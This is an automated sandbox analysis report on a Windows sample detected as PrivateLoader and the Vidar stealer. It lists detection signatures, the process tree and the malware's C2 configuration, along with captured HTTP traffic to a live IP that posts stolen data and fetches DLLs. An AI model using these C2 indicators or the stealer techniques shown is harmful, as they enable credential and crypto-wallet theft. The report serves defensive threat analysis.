Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1440170
MD5:43b0461d2e1c77a8530d66d3e1ae0175
SHA1:96c50c5b2d652a572e18147e213e8bea38118f94
SHA256:d4536f1b7e5fbfdfe66be6a404147230dcff7728bc559b493d7bdd8e1adaea08
Tags:exe
Infos:

Detection

PrivateLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected AntiVM3
Yara detected PrivateLoader
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 43B0461D2E1C77A8530D66D3E1AE0175)
    • conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 2832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 7700 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGDAAKJJDAAK" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7756 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199681720597"], "Botnet": "681a223bec180ebfdc48547d3d5bd784", "Version": "9.6"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dllJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
          • 0x221f0:$s1: JohnDoe
          • 0x32f80:$s1: JohnDoe
          • 0x221e8:$s2: HAL9TH
          00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 4 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                2.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  2.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                  • 0x20ff0:$s1: JohnDoe
                  • 0x20fe8:$s2: HAL9TH
                  2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    2.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                    • 0x221f0:$s1: JohnDoe
                    • 0x32f80:$s1: JohnDoe
                    • 0x221e8:$s2: HAL9TH
                    0.2.file.exe.630000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: file.exeAvira: detected
                      Found malware configuration
                      Source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199681720597"], "Botnet": "681a223bec180ebfdc48547d3d5bd784", "Version": "9.6"}
                      Multi AV Scanner detection for domain / URL
                      Source: https://65.109.242.112Virustotal: Detection: 11%Perma Link
                      Source: https://65.109.242.112/Virustotal: Detection: 11%Perma Link
                      Source: https://65.109.242.112/sqlx.dllVirustotal: Detection: 10%Perma Link
                      Source: https://65.109.242.112/#Virustotal: Detection: 11%Perma Link
                      Machine Learning detection for sample
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004062F8 CryptUnprotectData,LocalAlloc,LocalFree,2_2_004062F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410D92 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_00410D92
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406295 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00406295
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408331 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,2_2_00408331
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402484 memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,2_2_00402484
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C95A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6C95A9A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9544C0 PK11_PubEncrypt,2_2_6C9544C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C924420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,2_2_6C924420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C954440 PK11_PrivDecrypt,2_2_6C954440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,2_2_6C9A25B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,2_2_6C93E6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C95A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,2_2_6C95A650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C938670 PK11_ExportEncryptedPrivKeyInfo,2_2_6C938670
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C97A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,2_2_6C97A730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C980180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,2_2_6C980180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9543B0 PK11_PubEncryptPKCS1,PR_SetError,2_2_6C9543B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C977C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,2_2_6C977C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C97BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,2_2_6C97BD30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C937D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,2_2_6C937D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C979EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,2_2_6C979EC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C953FF0 PK11_PrivDecryptPKCS1,2_2_6C953FF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C953850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,2_2_6C953850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C959840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,2_2_6C959840
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 23.195.238.96:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 65.109.242.112:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2178967195.000000006F90D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                      Source: Binary string: C:\na3eg3m\First.pdb source: file.exe
                      Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                      Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                      Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                      Source: Binary string: C:\na3eg3m\First.pdb% source: file.exe
                      Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2178967195.000000006F90D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr

                      Spreading

                      barindex
                      Yara detected PrivateLoader
                      Source: Yara matchFile source: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll, type: DROPPED
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CF963 FindFirstFileExW,0_2_006CF963
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CFE47 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006CFE47
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004163B3 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004163B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004154FA _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004154FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B4B6 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B4B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409538 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409538
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C6CD _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C6CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415BC6 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415BC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409FC5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409FC5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409953 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409953
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A9D4 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A9D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415F6A _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415F6A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415947 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415947
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                      Networking

                      barindex
                      Yara detected PrivateLoader
                      Source: Yara matchFile source: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll, type: DROPPED
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199681720597
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199681720597 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.195.238.96 23.195.238.96
                      Source: Joe Sandbox ViewIP Address: 65.109.242.112 65.109.242.112
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 7109Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
